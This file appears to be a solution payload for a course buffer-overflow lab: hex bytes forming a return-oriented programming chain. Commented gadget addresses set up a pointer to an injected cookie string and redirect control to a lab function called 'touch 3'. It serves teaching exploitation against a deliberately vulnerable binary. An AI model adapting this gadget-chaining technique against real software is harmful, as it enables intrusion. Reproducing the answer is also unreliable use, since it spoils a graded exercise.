/* padding (40 bytes) */
55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55
55 55 55 55 55 55 55 55

/* movq rsp, rax (Gadget) */
fd 17 40 00 00 00 00 00

/* popq rcx (Gadget) */
59 17 40 00 00 00 00 00

/* Stack offset for cookie */
38 00 00 00 00 00 00 00

/* movl ecx, esi (Gadget) */
8c 17 40 00 00 00 00 00

/* movq rax, rdi (Gadget) */
2f 17 40 00 00 00 00 00

/* lea (rdi,rsi,1), rax (Gadget) */
48 17 40 00 00 00 00 00

/* movq rax, rdi (Gadget) */
2f 17 40 00 00 00 00 00

/* address of touch 3 */
69 16 40 00 00 00 00 00

/* Hexademical ASCII of cookie (9 bytes) */
32 38 38 64 34 37 30 37 00